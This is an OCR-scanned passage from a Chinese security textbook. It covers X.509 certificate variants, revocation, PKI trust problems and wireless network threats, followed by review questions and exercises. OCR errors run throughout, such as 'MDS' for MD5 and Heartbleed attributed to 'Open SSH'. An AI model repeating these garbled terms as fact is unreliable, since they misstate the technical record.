执行 代码 进行 签名 ， 或 用 于 其 他 前 面 我 们 列举 过 的 应 用 中 。 任 何 一 个 证 书 密 钥 的 用 途 ， 是 由 
“ 密 钥 用 途 (Key Usage)” 和 “扩展 密 钥 用 途 (Extended Key Usage)” 的 扩展 部 分 限定 的 ， 其 中 
规定 了 一 系列 被 认可 的 用 途 。 "终端 用 户 ” 证 书 不 允许 对 其 他 证 书 进 行 签名 ， 除 了 下 文 将 要 讨 
论 的 关于 代理 证 书 (proxy-certificates) 的 特殊 情况 。 

上 述 讨论 的 CA 和 “终端 用 户 ” 证 书 是 X.509 证 书 的 最 为 常见 的 形式 。 然 而 也 存在 一 些 特 
殊 的 变 体 ， 它 们 是 按 特定 元 素 值 或 某 些 扩展 进行 划分 的 。 变 体 包括 : 

o 传统 (长 效 ) UEP (conventional (long-lived) certificate): 是 上 述 讨论 过 的 CA 和 “终端 

用 户 ” 证 书 。 它 们 的 有 效 期 通常 从 几 个 月 到 几 年 。 

e 短 效 证 书 (short-lived certificate): 用 来 对 应 用 进行 认证 ,例如 网 格 计 算 (grid 
computing)， 从 而 避免 了 传统 证 书 的 一 些 开 销 和 限制 [HSU98]。 它 们 的 有 效 期 为 从 几 个 
小 时 到 几 天 ， 如 果 有 威胁 ， 这 将 缩短 误 用 的 时 间 段 。 因 为 它们 通常 不 是 由 公认 的 机 构 
颁发 的 ， 其 中 还 存在 在 证 书 颁发 组 织 之 外 对 证 书 进行 验证 的 问题 。 

e 代理 证 书 (proxy certificate): 现 被 广泛 用 于 为 应 用 提供 认证 ， 例 如 网 格 计算 ， 从 而 克服 

了 短 效 证 书 的 一 些 局 限 。 代 理 证 书 被 定义 在 RFC 3820 中 ,通过 “代理 证 书 ” 扩 展 的 存 
在 与 否 进行 识别 。 它 们 允许 “终端 用 户 ”证 书 对 其 他 证 书 进行 签名 ， 这 必须 是 包含 它 
们 身份 、 有 效 期 和 授权 子 集 的 已 有 证 书 的 一 个 扩展 。 它 们 允许 用 户 在 某 些 环境 下 轻易 
地 创建 一 个 访问 资源 的 凭证 ( credential)， 访 问 这 些 资源 并 不 需要 提供 全 部 的 证 书 和 权 
限 。 其 他 建议 是 ， 使 用 代理 证 书 作为 网 络 访问 能 力 的 票据 ， 以 便 授权 用 户 以 特定 的 权 
限 访问 特定 的 服务 。 

属性 证 书 (attribute certificate): 使 用 了 一 个 不 同 的 证 书 格式 ， 定 义 于 RFC 5755 中 , 将 
用 户 的 身份 与 一 系列 属性 结合 ， 这 些 属性 通常 被 用 于 授权 和 访问 控制 。 用 户 可 以 拥有 
一 些 不 同 的 属性 证 书 ， 不 同 的 目的 对 应 不 同 的 属性 集合 ， 且 与 主要 的 传统 证 书 相 联系 。 
这 些 属 性 被 定义 在 “属性 (Attributes)” 扩 展 中 。 这 些 扩展 也 可 被 包含 在 传统 证 书 中 ， 
但 并 不 鼓励 这 种 做 法 ， 因 为 这 将 变 得 太 不 灵活 。 这 些 扩 展 也 可 能 包含 于 代理 证 书 中 ， 
用 于 进一步 限制 其 使 用 ， 这 对 于 一 些 应 用 是 合适 的 。 

在 使 用 任何 证 书 之 前 ， 应 用 必须 检查 其 有 效 性 ， 并 保证 其 到 期 前 不 会 被 吊销 。 如 果 因 为 密 
钥 已 经 受到 威胁 或 者 因为 用 户 软 件 需要 升级 需要 产生 新 的 密 钥 ， 用 户 希 望 取消 密 钥 时 ， 上 述 情 
况 就 会 出 现 。 

X.509 标准 定义 了 一 个 证 书 吊 销 列 表 ( CRL)， 是 由 颁发 者 签名 的 ， 其 中 包含 的 要 素 如 图 23-3b 
所 示 。 每 一 个 被 吊销 的 证 书记 录 都 包含 了 证 书 的 序列 号 和 证 书 吊 销 日 期 。CA 颁发 的 证 书 序 列 
号 是 唯一 的 ， 足 以 识别 证 书 。 当 一 个 应 用 接收 了 一 个 证 书 ，X.509 标准 声明 应 用 应 该 在 签发 证 
书 的 CA 的 当前 的 CRL 中 确认 证 书 是 否 已 被 吊销 。 然 而 ， 因 检索 和 存储 这 些 列表 的 开销 原因 ， 
很 少 的 应 用 这 样 做 。“ 最 近 的 Heartbleed Open SSH 的 bug， 强 行 吊销 和 替代 了 大 量 的 服务 器 证 
书 ， 这 很 大 程度 上 凸显 了 CRL 使 用 中 存在 的 缺陷 。” 

更 实用 的 另 一 个 方法 ， 是 使 用 在 线 证 书 状态 协议 (Online Certificate Status Protocol) 向 
CA 请 求 查询 关于 某 一 特定 的 证 书 是 否 有 效 。 这 一 轻 量 级 的 协议 在 RFC 6960 中 被 定义 ， 并 被 
越 来 越 多 地 使 用 ,许多 最 常见 的 Web 浏览 器 的 近期 版 本 使 用 了 这 一 方法 。“ 如 果 证 书签 发 CA 
(signing CA) 支持 这 一 协议 ， 则 证 书 中 的 权威 信息 访问 (Authority Information Access) 扩展 可 
指定 OCSP 服务 器 的 地 址 以 供 使 用 。” 

许多 旧版 本 的 X.509 证 书 用 MDS 散 列 值 对 其 内 容 进行 签名 。 不 幸 的 是 ， 关 于 产生 MDS 
冲突 的 研究 进展 ， 导 致 了 为 不 同 身份 用 相同 散 列 值 伪 造 新 证 书 的 一 些 技术 的 发 展 ， 因 此 能 够 重 
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用 相同 的 签名 作为 合法 有 效 的 证 书 [STEV07]。Flame 恶意 软件 的 作者 就 使 用 了 这 一 方法 伪造 
出 看 似 合法 有 效 的 微软 代码 签名 (Microsoft code-signing) 证 书 。 这 使 得 此 恶意 软件 在 超过 两 年 
的 时 间 内 都 没有 被 发 现 ， 直 到 2012 年 才 被 检测 出 。 显 然 ， 新 的 X.509 证 书 不 应 使 用 MDS 散 列 
函数 进行 得 名， 此外， 任何 仍然 用 MD5 进行 签名 的 有 效 证 书 都 应 当 尽 早 被 吊销 并 替代 。 


23.3 ZAR MIZE 

RFC 4949 (Internet Security Glossary, Internet 安全 术语 ) 将 公 钥 基础 设施 ( public-key 
infran-structure, PKI) 定义 为 基于 非 对 称 密码 体制 ， 用 来 生成 、 管 理 、 存 储 、 分 配 和 撤销 数字 
证 书 的 一 套 硬件 、 软 件 、 人 员 、 策 略 和 过 程 。 开 发 一 个 PKI 的 主要 目标 是 使 安全 、 方 便 和 高 
效 获 取 公 钥 成 为 可 能 。 

为 验证 一 个 证 书 ， 你 应 当知 道 签发 CA (signing CA) 的 公 钥 。 这 可 能 相应 地 由 另 一 个 
证 书 提供 ， 并 被 一 个 父 CA (parent CA) 签名 ， 因 为 CA 按 层 次 进行 组 织 。 最 终 ， 无 论 如 何 ， 
你 必 将 追溯 到 最 高 层 ， 并 具有 根 CA (root CA) 公 钥 的 一 个 副本 。X.509 标准 在 对 PKI 模型 
进行 描述 时 ， 最 初 假设 存在 一 个 具有 固定 层 的 、 国 际 公 认 的 、 由 政府 管理 的 CA。 但 这 并 未 
实现 。 而 当前 的 X.509 实现 是 由 一 个 庞大 的 CA 列表 及 其 公 钥 构成 的 ， 就 是 已 知 的 “可 信 存 
储 库 (trust store)”。 通 常情 况 下 ， 这 些 CA 要 么 直接 签发 “终端 用 户 ” 证 书 ， 要 么 就 为 一 小 
部 分 中 间 CA (Intermediate-CA) 依次 签发 证 书 ， 这 些 中 间 CA 会 转 而 为 “终端 用 户 ” 签 发 
证 书 。 因 此 ， 所 有 的 层 数 都 是 非常 少 的 ， 并 且 能 够 同等 信任 。 用 户 和 服务 器 若 想 要 获得 自动 
验证 的 证 书 ， 就 必须 从 这 些 CA 中 的 某 一 个 CA 获取 。 另 外 ， 它 们 可 以 使 用 “ 自 签名 (self- 
signed)” 证 书 或 者 使 用 由 其 他 CA 签发 的 证 书 。 但 是 ， 无 论 哪 种 情形 ， 这 些 证 书 最 初 都 会 被 
认为 是 “不 可 信 的 ”， 并 且 用 户 都 会 收 到 一 个 有 关 接 受 这 类 证 书 的 严重 警告 ， 即 使 这 些 证 书 
实际 上 是 合法 的 。 

这 一 PKI 模型 存在 诸多 的 问题 ， 这 也 是 多 年 前 被 知晓 的 [GUTM02]、[GRUS13]。 而 当前 
的 实现 也 颇 受 诉 病 。 首 先 就 是 验证 证 书 时 若 出 现 问题 ， 需 依赖 用 户 做 出 合理 决定 。 不 幸 的 是 ， 
很 明显 ， 大 多 数 用 户 并 不 知道 什么 是 证 书 以 及 为 什么 会 存在 问题 。 因 此 ， 他 们 选择 接受 或 拒绝 
这 一 证 书 时 ， 其 实 对 安全 了 解 甚 少 ， 这 就 可 能 导致 对 其 系统 的 损害 。 

另 一 个 至 关 重 要 的 问题 就 是 假设 可 信 存 储 库 (trust store) 的 所 有 CA 都 是 被 同等 信任 的 、 
同等 良好 管理 的 ， 采 用 同等 安全 策略 的 。 一 个 强 有 力 的 例证 就 是 2011 年 DigiNotar CA 遭受 的 
攻击 ， 这 导致 了 黑客 为 多 个 知名 机 构 发 行 了 伪造 证 书 。 人 们 普遍 认为 是 伊朗 政府 在 其 许多 市 
民 的 安全 通信 中 实施 了 “中 间 人 攻击 (man-the-middle)”。 这 导致 DigiNotar CA 密 钥 从 许多 系 
统 的 可 信 存 储 库 (trust store) 中 被 移 除 ， 而 该 公司 随后 宣布 破产 。 另 一 个 名 为 Comodo 的 CA, 
在 2011 年 也 遭受 了 攻击 ， 黑 客 发 行 了 少量 的 伪造 证 书 。 

更 进一步 的 问题 是 由 于 不 同 的 实现 方法 导致 的 ， 因 为 不 同 的 Web 浏览 器 和 操作 系统 使 用 
不 同 的 “可 信 存 储 库 (trust store)”， 因 此 为 用 户 呈 现 出 不 同 的 安全 视角 。 

由 于 所 给 出 的 这 些 问题 和 其 他 问题 ， 出 现 了 一 些 改 善 X.509 证 书 实际 应 用 的 提案 。 其 中 一 
些 建议 指出 ， 许 多 应 用 并 不 需要 将 已 验证 的 身份 与 公 钥 进 行 正式 联合 (formal linking)。 在 许多 
Web 应 用 中 ,例如 所 有 的 用 户 实际 上 需要 知道 的 仅 是 他 们 是 否 访问 了 同一 个 安全 的 网 站 和 是 否 
为 访问 它 提供 了 证 书 ， 以 及 知道 他 们 所 访问 的 网 站 和 使 用 的 密码 是 否 与 其 之 前 访问 的 网 站 和 使 
用 的 密码 相同 。 就 类 似 于 ， 保 证 你 再 次 造访 同一 实体 商店 时 ， 看 到 了 与 之 前 见 到 过 的 同样 的 名 
称 、 同 样 的 布局 、 同 样 的 员工 。 更 进一步 ， 用 户 想 知道 这 就 是 如 同 其 他 用 户 在 其 他 地 点 看 到 的 
一 样 ， 是 同一 个 网 站 ， 使 用 同一 个 密 钥 。 

首先 ， 在 时 间 上 不 断 地 进行 确认 ， 这 可 由 用 户 应 用 提供 ， 因 为 用 户 应 用 拥有 其 访问 的 所 
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有 网 站 的 证 书 细节 的 记录 ， 并 可 以 对 随后 访问 的 网 站 进行 检查 。 应 用 中 的 证 书 锁定 〈 certificate 
pinning) 能 够 提供 这 一 功能 ， 正 如 Google Chrome 所 使 用 的 。Firefox 的 “证 书 巡 查 ”(Certificate 
Patrol) 是 这 一 方法 的 另 一 个 例子 。 

其 次 ,在 空间 上 不 断 地 进行 确认 ， 这 要 求 广泛 地 使 用 一 些 “ 网 络 公证 服务 器 (network 
notary servers)” 为 所 有 访问 的 网 站 保持 证 书记 录 ， 可 以 与 在 任何 情况 下 提供 给 用 户 的 证 书 进 
行 比较 “展望 项 目 (Perspectives Project)” 就 是 这 一 方法 的 实际 应 用 ， 其 可 通过 Firefox 的 
“ Perspective ”插件 进行 访问 。 这 也 验证 了 使 用 证 书 的 时 间 历 史 ， 因 此 为 这 一 方法 提供 期 望 的 
特征 。“ 谷 歌 证 书目 录 (Google Certificate Catalog)” 和 “谷歌 证 书 透明 化 (Google Certificate 
Transparency)” 项 目 是 公证 服务 器 (notary server) 的 另外 一 些 例子 。 

以 上 这 些 情形 ,识别 其 他 时 间或 地 点 见 到 的 不 同 证 书 和 密 钥 ， 可 能 会 发 生 攻 击 或 者 具有 其 
他 问题 。 也 可 能 仅仅 是 由 于 证 书 将 失效 而 被 更 新 ,或 者 由 于 组 织 错误 地 为 相同 的 复制 服务 器 使 
用 了 多 个 证 书 和 密 钥 。 后 面 的 这 些 问题 需要 用 相应 的 扩展 进行 管理 。 


23.3.1 ” 公 钥 基础 设施 X.509 


Internet 工程 任务 组 ( Intemet Engineering Task Force, IETF) 公 负 基础 设施 X.509 (PKIX) T 
作 组 是 建立 一 个 基于 X.509 的 正式 (和 一 般 的 ) 模型 的 背后 推动 力量 ， 这 个 模型 适 于 在 Internet 
上 部 署 基于 证 书 的 基础 设施 。 本 节 介 绍 PKIX 模型 。 更 多 详细 的 介绍 请 参见 [STAL14a]。 

图 23-4 展示 了 PKIX 模型 中 各 个 关键 
要 素 间 的 相互 关系 。 这 些 要 素 包 括 需 要 颁 
发 证 书 的 端 实体 (end entity) (例如 用 户 或 
服务 器 ) 和 颁发 证 书 的 认证 中 心 ( Certificate 
Authority，CA)。CA 的 管理 功能 进一步 划 
分 为 注册 中 心 (Registration Authority, RA), 
RA 主要 处 理 端 实体 和 CRL 颁发 者 (CRL 
issuer) 的 注册 以 及 管理 CRL 的 存储 库 
(repository) » 

PKIX 识别 许多 管理 功能 ， 这 些 功能 可 
能 需要 管理 协议 来 支持 。 图 23-4 阐明 了 这 
个 过 程 ， 它 包括 如 下 要 素 : 用 户 注册 、 密 
钥 资料 的 初始 化 、CA 发 行 的 证 书 的 认证 、 
密 钥 对 恢复 和 更 新 、 证 书 的 撤销 申请 和 CA l 
间 的 交叉 认证 。 图 23-4 PKIX 架构 模型 


23.4 ”推荐 读物 


本 章 中 绝 大 多 数 主题 的 细节 可 参考 文献 [STAL14a]。 一 个 轻松 地 获得 Kerberos 概念 的 方法 
是 阅读 文献 [BRYA88]。 掌 握 Kerberos 技术 的 最 好 办 法 是 阅读 文献 [KOHL94]。[PERL99] 概述 
了 在 PKI 中 使 用 的 多 种 信任 模型 。[GUTM02] 强调 了 PKI 使 用 过 程 中 所 面临 的 困难 ， 并 推荐 了 
一 些 构造 有 效 的 PKI 的 办 法 。 
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Authentication Service.” In Brazier, F., and Johansen, D. Distributed Open 
Systems. Los Alamitos, CA: IEEE Computer Society Press, 1994. Available 
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关键 术语 、 复 习题 和 习题 


关键 术语 


authentication server (AS， 认 证 服务 器 ) Registration authority (RA， 注 册 中 心 ) 
Certificate Authority (CA， 认 证 中 心 ) ticket-granting ticket (TGT， 票 据 授 予 票据 ) 
End entity ( 端 实体 ) ticket-granting server (TGS ， 票 据 授予 服务 器 ) 
Kerberos realm (Kerberos 域 ) X.509 certificate (X.509 证 书 ) 

Public-Key Infrastructure (PKI， 公 钥 基 础 设施 ) 


复习 题 


23.1 
23.2 
23.3 
23.4 
23.5 
23.6 
23.7 
23.8 
23.9 
23.10 
23.11 
23.12 


习题 


23.1 


一 个 Kerberos 系统 的 基本 要 素 是 什么 ? 
什么 是 Kerberos 域 ? 
Kerberos 版 本 4 和 版 本 5 有 什么 不 同 ? 
什么 是 X.509 7 
X.509 证 书 中 包含 哪些 基本 要 素 ? 
CA 在 X.509 中 扮演 什么 样 的 角色 ? 
有 哪些 不 同类 型 的 X.509 证 书 ? 
存在 哪些 替代 方案 用 于 检查 一 个 X.509 证 书 没有 被 吊销 ? 
什么 是 公 钥 基础 设施 ? 
现 有 的 大 多 数 X.509 实现 ， 是 如 何 检 查证 书签 名 的 合法 性 的 ? 
现 有 的 公 钥 基础 设施 实现 中 的 一 些 主 要 问题 是 什么 ? 
列 出 PKIX 模型 的 关键 要 素 。 


密 文 分 组 链接 (Cipher Block Chaining, CBC) 有 这 样 的 特性 ， 如 果 在 密 文 分 组 Ci 传输 过 程 中 发 生 
一 个 错误 ， 那 么 这 个 错误 就 传递 (propagate) 到 被 恢复 的 明文 分 组 P: 和 Prao Kerberos 版 本 4 使 用 
一 个 CBC 的 一 个 扩展 ， 叫 作 传递 CBC (PCBC) 模式 。 这 个 模式 有 这 样 的 性 质 ， 在 一 个 密 文 分 组 
里 的 错误 被 传递 到 所 有 后 继 的 解密 消息 分 组 ， 致 使 每 个 分 组 都 是 无 效 的 。 因 此 数据 加 密 和 完整 性 
通过 一 个 操作 组 合 在 一 起 。 对 于 PCBC， 加 密 算法 的 输入 是 当前 的 明文 分 组 、 前 一 个 密 文 分 组 和 前 
一 个 明文 分 组 的 异 或 : 
Ci=E(K, [Cri D Pri ® PD) 

在 解密 时 ， 每 个 密 文 组 通过 解密 算法 解密 。 输 出 与 前 一 个 密 文 分 组 以 及 前 一 个 明文 分 组 进行 
HR. 

a. 画 一 个 和 第 21 章 中 相似 的 图 来 说 明 PCBC. 

b. 使 用 一 个 布尔 等 式 说 明 PCBC 的 工作 流程 。 

c. 说 明 一 个 在 密 文 分 组 中 的 随机 错误 是 如 何 被 传递 到 所 有 后 继 的 明文 分 组 的 。 
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23.2 ”假设 在 PCBC 模式 下 ， 块 C 和 Cn 在 传送 过 程 中 交换 了 。 请 证 明 其 影响 仅 涉 及 解密 块 忆 和 Pu， 
而 不 影响 后 续 块 。 
23.3 ”考虑 以 下 列 出 的 X.509 证 书 的 细节 。 
a. 辨认 X.509 证 书 中 的 关键 要 素 ， 包括 所 有 者 的 名 称 和 公 和 钥 、 有 效 期 、 签 发 此 证 书 的 CA 名 称 、 
签名 的 类 型 和 值 。 
b. 说 明 它 是 一 个 CA 证 书 还 是 一 个 终端 用 户 证 书 ， 并 阐述 原因 。 
c. 说 明证 书 是 否 有 效 ， 并 阐述 原因 。 
d. 说 明 在 此 证 书 的 算法 的 运用 中 是 否 存在 明显 的 问题 。 


Certificate: 
Data: 
Version: 3 (0x2) 
Serial Number: 3c:50:33:c2:£8:e7:5c:ca:07:c2:4e:83:f£2:e8:0e:4f 
Signature Algorithm: md5WithRSAEncryption 
Issuer: O=VeriSign, Inc., 
OU=VeriSign Trust Network, 
CN=VeriSign Class 1 CA Individual - Persona Not Validated 
Validity i 
Not Before: Jan 13 00:00:00 2000 GMT 
Not After : Mar 13 23:59:59 2000 GMT 
Subject: O=VeriSign, Inc., 
OU=VeriSign Trust Network, 
OU=Persona Not Validated, 
OU=Digital ID Class 1 - Netscape 
CN=John Doe/Email=john.doe@adfa.edu.au 
Subject Public Key Info: 
Public Key Algorithm: rsaEncryption 
RSA Public Key: (512 bit) 

Modulus (512 bit): 
00:98:£2:89:c4:48:e1:3b:2c:c5:d1:48:67:80:53: 
d8:eb:4d:4£:ac:31:a9:£d:11:68:94:ba:44:d8:48: 
46:0d:fc:5c:6d:89:47:3£:9£:d0:c0:6d:3e:9a:8e: 
ec:82:21:48:9b:b9:78:cf:aa:09:61:92:f6:dl:cf: 
4S:ca:ea:8f:df 

Exponent: 65537 (0x10001) 

X509v3 extensions: 
X509v3 Basic Constraints: 
CA: FALSE 
X509v3 Certificate Policies: 
Policy: 2.16.840.1.113733.1.7.1.1 
CPS: https://www.verisign.com/CPS 
X509v3 CRL Distribution Points: 
URI:http://crl.verisign.com/classl.crl 
Signature Algorithm: mdS5WithRSAEncryption 
5a:71:77:c2:ce:82:26:02:45:41:a5:11:68:d6:99:f0:4c:ce: 
Ja:ce:80:44:£4:a3:1a:72:43:e9:dc:el:la:9b:ec:64:£7:ff: 
21:£2:29:89:d6:61:e5:39:bd:04:e7:e5:3d:7b:14:46:d6:eb: 
8e:37:b0:cb:ed:38:35:81:1£:40:57:57:58:a5:c0:64:ef:55: 
59:00:79:75:7a:54:47:6a:37:b2:6C:23:6b:57:40:62:2£:94: 
d3 :aa:69:9d:3d:64:43:61:a7:a3:e0:b8:09:ac:94:9b:23:38: 
e8:1b:0f:e5:1b:6e:e2:fa:32:86:£0:c4:0b:ed:89:d9:16:e4: 
a7:77 
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23.4 用 你 的 浏览 器 访问 一 个 安全 网 站 (例如 ， 某 个 以 “https” 作 为 其 URL 开头 的 网 站 )， 检 查 此 网 站 使 


23.5 


FAM X.509 证 书 的 细节 。 这 通常 是 通过 选择 挂 锁 符 ( padlock symbol) 进行 访问 ， 回 答 习 题 23.3 中 
涉及 的 同类 问题 。 

访问 你 的 浏览 器 所 使 用 的 信任 存储 库 (证 书 列表 )。 这 通常 是 通过 它 的 优先 级 设 定 实现 的 。 访 问 浏 
览 器 使 用 的 认证 中 心 证 书 ( Certificate Authority certificate) 列表 ， 选 取 其 中 一 个 并 检查 它 所 使 用 
的 X.509 证 书 的 细节 。 回 答 习 题 23.3 中 涉及 的 同类 问题 。 


| 第 24 章 
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学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 概述 无 线 网 络 的 安全 威胁 和 防护 措施 ; 

© 理解 组 织 网 络 中 使 用 移动 设备 面临 的 特有 的 安全 威胁 ; 


© 描述 移动 设备 安全 策略 的 主要 组 成 要 素 ; 
o 理解 IEEE 802.11 无 线 局 域 网 标准 的 基本 要 素 ; 
o 概括 IEEE 802.11i 无 线 局 域 网 安全 架构 的 各 种 组 件 。 


无 论 是 对 个 人 还 是 组 织 而 言 ， 基 于 无 线 网 络 和 通信 线路 的 通信 如 今 都 已 相当 普遍 。 无 线 通 
信 可 以 借 由 许多 不 同 的 技术 和 网 络 类 型 来 实现 ， 包 括 Wi-Fi, EF., WiMAX, ZigBee, RH 
术 等 。 尽 管 本 书 前 面 所 讲述 的 安全 威胁 与 对 策 都 可 以 应 用 于 无 线 网 络 和 通信 线路 上 ， 但 针对 无 
线 环境 还 有 一 些 无 线 网 络 特有 的 安全 威胁 与 对 策 。 

本 章 首 先 介 绍 无 线 网 络 相 关 问 题 概 况 。 然 后 ， 从 组 织 使 用 的 移动 设备 出 发 ， 集 中 讨论 移 
动 设 备 安全 的 新 领域 。 接 下 来 ,介绍 无 线 网 络 安全 的 IEEE 802.111 标准 ， 这 个 标准 是 IEEE 
802.11 标准 的 一 部 分 ， 也 被 称 作 Wi-Fi。 我 们 从 概述 IEEE 802.11 标准 开始 ， 然 后 介绍 IEEE 
802.11i 标准 的 具体 细节 。 


24.1 无 线 安全 


无 线 网 络 和 使 用 无 线 网 络 的 无 线 设备 ， 引 出 了 许多 有 线 网 络 安全 问题 之 外 的 新 问题 。 相 比 
有 线 网 络 ， 导 致 无 线 网 络 安全 面临 更 高 威胁 的 一 些 关键 因素 有 : 
。 信道 : 无 线 网 络 的 通信 方式 一 般 为 广播 通信 ， 比 有 线 网 络 更 容易 出 现 窃听 和 拥堵 现象 。 
无 线 网 络 更 容易 遭受 利用 通信 协议 漏洞 的 主动 攻击 。 
。 移动 性 : 无 论 从 原理 还 是 从 实践 上 看 ， 无 线 设备 均 具 有 远 超过 有 线 设备 的 可 携带 、 可 
移动 性 。 这 一 特点 会 产生 更 多 的 安全 隐患 ， 下 文 将 会 讲述 。 
。 AR: 一 些 无 线 设备 ， 例 如 智能 手机 和 平板 电脑 ， 其 操作 系统 比较 复杂 ， 而 设备 的 存 
储 资源 和 计算 资源 有 限 ， 这 种 情况 下 ， 可 能 会 面临 包括 拒绝 服务 攻击 和 恶意 代码 在 内 
的 安全 威胁 。 | 
。 可 访问 性 : 一 些 无 线 设备 ， 例 如 传感器 和 机 器 人 ， 可 能 需要 在 无 人 值守 的 状态 下 被 贸 
置 于 偏僻 或 敌 占 区 域 ， 这 就 增 大 了 其 遭受 物理 攻击 的 可 能 性 。 
简单 地 讲 ， 无 线 网 络 环境 有 三 个 容易 遭受 攻击 的 组 件 ( 见 图 24-1 )。 无 线 客户 端 ， 一 般 为 
手机 、 具 有 Wi-Fi 功能 的 笔记 本 电脑 或 平板 电 
脑 、 无 线 传感器 、 蓝 牙 设备 等 。 无 线 接 人 点 ， 
提供 了 到 网 络 或 服务 的 连接 ， 无 线 接 入 点 可 以 
是 手机 基站 、Wi-Fi 热 点 和 接 入 有 线 局 域 网 和 
广域网 的 无 线 接 入 点 。 传 输 介 质 ， 如 用 于 数据 。 终端 接 人 点 
传输 的 无 线 电波 ， 也 是 脆弱 性 的 源头 之 一 。 图 24-1 无 线 网 络 的 组 成 
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24.1.1 无 线 网 络 威胁 


[CHOI08] 列举 了 如 下 无 线 网 络 面临 的 安全 威胁 : 

e 偶然 关联 : 将 无 线 局 域 网 或 者 无 线 接 人 点 接 人 附近 位 置 的 有 线 局 域 网 (比如 同一 栋 建 
筑 物 或 者 相 邻 的 建筑 物 ) 时 ， 可 能 产生 重 秋 的 传输 覆盖 范围 。 当 用 户 试图 连接 一 个 局 
域 网 时 ， 可 能 不 小 心 自 动 锁定 到 一 个 临近 网 络 的 无 线 接 人 点 。 这 种 安全 事故 是 偶然 出 
现 的 ， 然 而 却 会 将 局 域 网 内 的 资源 暴露 给 偶然 接 人 的 用 户 。 

e 恶意 关联 : 一 个 无 线 设备 能 够 配置 成 为 一 个 看 似 合法 的 接 人 点 ， 使 得 操作 者 可 以 从 合 
法 用 户 窃取 密码 ， 然 后 操作 者 能 够 经 由 合法 的 无 线 接 入 点 渗透 到 有 线 网 络 中 。 

e ad-hoc 网 络 : 这 些 是 点 对 点 网 络 ， 计 算 机 之 间 不 经 由 接 人 点 而 直接 相连 接 。 由 于 缺少 
控制 中 心 ， 这 种 网 络 容易 面临 一 定 的 安全 威胁 。 

o 非 传统 网 络 : 非 传统 网 络 和 连接 ， 比 如 个 人 网 络 蓝牙 设备 、 条 形 码 扫描 器 、 手 持 PAD 
等 ， 面 临 着 窃听 和 欺骗 等 安全 威胁 。 

© 身份 盗用 (MAC 欺骗 ): 如 果 攻 击 者 能 够 窃听 网 络 流量 ， 并 能 识别 具有 网 络 特权 的 计算 
机 的 MAC 地 址 ， 就 会 发 生 身份 盗用 。 

e 中 间 人 攻击 : 这 种 攻击 方法 在 第 21 章 Diffie-Hellman 密 钥 交 换 协 议 中 介绍 过 。 广 义 上 
说 ， 这 种 攻击 需要 使 用 户 和 接 人 点 双方 相信 他们 互相 之 间 在 进行 直接 对 话 ， 而 实际 上 
通信 过 程 是 经 由 中 间 攻 击 设备 的 。 无 线 网 络 极 易 遭 受 这 种 方式 的 攻击 。 

© 拒绝 服务 攻击 (DoS): 这 种 类 型 的 攻击 在 第 7 章 详细 讨论 过 。 在 无 线 网 络 的 场景 下 ， 
一 个 拒绝 服务 攻击 可 能 会 在 攻击 者 持续 不 断 地 以 各 种 协议 消息 序 炸 无 线 接 人 点 或 者 其 
他 可 访问 无 线 端口 的 情况 下 发 生 ， 以 达到 消耗 系统 资源 的 目的 。 无 线 环 境 比 有 线 网 络 
更 容易 受到 这 种 方式 的 攻击 ， 因 为 攻击 者 很 容易 向 攻击 目标 发 送 各 种 无 线 消息 。 

e 网 络 注入 : 网 络 注 入 攻击 是 针对 无 线 接 入 点 对 网 络 流量 不 进行 过 滤 的 情况 ， 比 如 路 由 
协议 消息 或 网 络 管理 消息 。 例 如 ， 攻 击 者 通过 发 送 伪造 的 重新 配置 命令 来 影响 路 由 器 
和 交换 机 的 工作 ， 从 而 降低 整个 网 络 的 性 能 。 


24.1.2 无 线 安全 防护 措施 


依据 文献 [CHOI08]， 我 们 把 无 线 安全 防护 措施 分 为 三 类 ， 分 别 对 应 无 线 传输 、 无 线 接 入 
点 和 无 线 网 络 (由 无 线路 由 和 端点 构成 )。 

安全 无 线 传输 无 线 传输 的 主要 威胁 是 窃听 、 得 改 或 插 和信 消 息 和 破坏 攻击 。 抵 御 窃听 攻击 
的 有 效 对 策 有 两 种 : 

。 信号 隐藏 技术 : 组 织 可 以 采取 多 种 措施 使 攻击 者 难以 定位 他 们 的 无 线 接 入 点 ， 例 如 关 

闭 无 线 接 人 点 的 服务 集 标识 符 (SSID) 广播 ， 将 服务 集 标识 符 ( SSID) 设 为 隐秘 的 名 
称 ， 在 保证 必要 的 信号 覆盖 范围 的 前 提 下 减 小 信号 强度 ， 将 无 线 接 入 点 放置 在 远离 窗 
户 和 外 墙 的 建筑 物 内 部 。 此 外 ， 使 用 定向 天 线 和 信号 屏蔽 技术 可 以 达到 更 好 的 安全 防 
护 效果 。 

。 WE: 在 保证 密 钥 安全 的 情况 下 ， 对 无 线 传输 进行 加 密 可 以 有 效 地 抵御 窃听 攻击 。 

使 用 加 密 和 认证 协议 是 抵御 改变 或 插入 传输 攻击 的 一 种 标准 方法 。 

本 书 第 7 章 讨论 过 拒绝 服务 攻击 的 应 对 方法 ， 这 些 方法 也 可 以 应 用 到 无 线 传输 中 来 。 与 此 
同时 ， 拥 有 无 线 网 络 的 组 织 也 可 以 采取 措施 以 减少 无 意 中 形成 的 拒绝 服务 攻击 发 生 的 可 能 性 。 
实地 勘察 时 可 以 检测 到 当前 正在 使 用 同一 波段 范围 进行 通信 的 其 他 设备 ， 这 有 助 于 确定 无 线 接 
入 点 的 放置 位 置 。 通 过 调整 信号 强度 ， 进 行 适当 的 信号 屏蔽 ， 可 以 使 得 所 构建 的 无 线 环境 尽 可 
能 孤立 ， 避 免 其 他 无 线 信号 环境 的 干扰 。 
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安全 无 线 接 入 点 ”无 线 接 人 点 的 主要 威胁 是 网 络 的 非 认证 访问 。 避 免 非 认证 访问 的 主要 方 
式 是 采用 IEEE 802.1X 标准 协议 进行 网 络 访问 控制 。 该 标准 提供 了 一 种 认证 机 制 ， 用 于 对 试图 
连接 到 网 络 中 的 设备 进行 认证 。 采 用 802.1X 协议 能 够 避免 接 人 点 欺骗 和 阻止 其 他 非 授权 设备 
成 为 不 安全 后 门 。 

24.3 节 介绍 802.1X 协议 的 内 容 。 

安全 无 线 网 络 【CHOI08] 推荐 了 用 于 保证 无 线 网 络 安全 的 如 下 技术 : 

1. 使 用 加 密 技术 。 无 线路 由 器 通常 内 置 加 密 机 制 以 加 密 路 由 之 间 的 通信 流量 。 

2. 使 用 反 病 毒 、 反 间谍 软件 和 防火 墙 。 这 些 软 件 应 该 部 署 在 所 有 无 线 网 络 终端 。 

3. 关闭 标识 符 广 播 。 无 线路 由 器 的 默认 设置 是 开启 标识 符 广播 ， 一 定 范围 内 的 任何 设备 都 
